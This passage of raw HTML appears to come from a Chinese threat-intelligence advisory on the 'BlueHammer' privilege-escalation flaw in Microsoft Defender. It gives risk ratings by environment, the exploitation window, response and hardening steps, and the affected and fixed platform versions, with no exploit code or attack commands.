style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">场景</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">风险等级</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">说明</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">企业内网终端</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">高</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">攻击者可通过横向移动抵达高价值资产</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">开发测试环境</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">高</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">代码签名环境被攻陷可导致供应链风险</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">运维跳板机</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">极高</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">SYSTEM权限可完全控制运维通道</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">域控制器所在终端</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">极高</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">可用于Active Directory提权攻击</span></p></td></tr></tbody></table><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">漏洞利用窗口评估</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">BlueHammer漏洞的公开披露时间为2026年4月7日（早于官方修复），微软官方修复发布于4月14日。从4月7日至4月14日的</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">7天零日窗口期</span></strong><span leaf="">内，漏洞利用代码可能已被恶意行为体获取并部署。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">当前漏洞利用代码已进入地下黑市流通渠道。从漏洞公开到野外部署的典型时间窗口通常为</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">2-4周</span></strong><span leaf="">，但考虑到该漏洞的低复杂度特性，实际利用可能更快出现。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">国内企业应对建议</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">针对该漏洞对国内政企环境的影响，奇安信威胁情报中心建议采取以下分级响应措施：</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">紧急响应（72小时内）</span></strong><span leaf="">：</span></p><ul style="list-style-type: circle;" class="list-paddingleft-1"><ul style="list-style-type:disc;" class="list-paddingleft-1"><li style="font-size:16px;"><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">验证所有Windows终端的Defender平台版本是否升级至</span></span><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">4.18.26030.3011</span></span></strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">或更高</span></span></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li style="font-size:16px;"><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">优先处置面向互联网的高暴露面服务器和研发环境终端</span></span></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li style="font-size:16px;"><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">启用端点检测与响应（EDR）系统对本地提权行为进行深度监控</span></span></p></li></ul></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">中期加固（1-2周）</span></strong><span leaf="">：</span></p><ul style="list-style-type: circle;" class="list-paddingleft-1"><ul style="list-style-type:disc;" class="list-paddingleft-1"><li style="font-size:16px;"><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">部署应用白名单（AppLocker/WDAC）策略，限制非授权可执行文件在特权目录的执行</span></span></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li style="font-size:16px;"><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">强化Active Directory域环境安全，监控异常的管理员账户创建行为</span></span></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li style="font-size:16px;"><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">开展内部红蓝对抗演练，验证现有防护体系对该攻击链的检测能力</span></span></p></li></ul></ul><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">漏洞修复与防护建议</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">版本核查</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">微软已发布修复版本，建议立即执行以下核查步骤：</span></p><ul style="list-style-type: circle;" class="list-paddingleft-1"><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">打开Windows安全中心应用（Windows Security）</span></span></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">导航至</span></span><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">病毒和威胁防护</span></span></strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;"> → </span></span><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">管理设置</span></span></strong></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">点击</span></span><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">保护更新</span></span></strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;"> → </span></span><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">检查更新</span></span></strong></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">进入</span></span><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">设置</span></span></strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;"> → </span></span><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">关于</span></span></strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">，</span><span textstyle="" style="font-size: 16px;">查看</span></span><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">反恶意软件客户端版本</span></span></strong></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">确认版本号 ≥ </span></span><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">4.18.26030.3011</span></span></strong></p></li></ul></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">漏洞影响范围</span></h3><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">软件/平台</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">受影响版本</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">已修复版本</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Microsoft Defender Antimalware Platform</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">≤ 4.18.26020.6</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">≥ 4.18.26030.3011</span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">特殊说明</span></strong><span leaf="">：即使Windows Defender被禁用，受影响的二进制文件仍存留于系统。微软澄清，禁用状态下的系统</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">不处于可利用状态</span></strong><span leaf="">，但仍建议更新至安全版本。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, 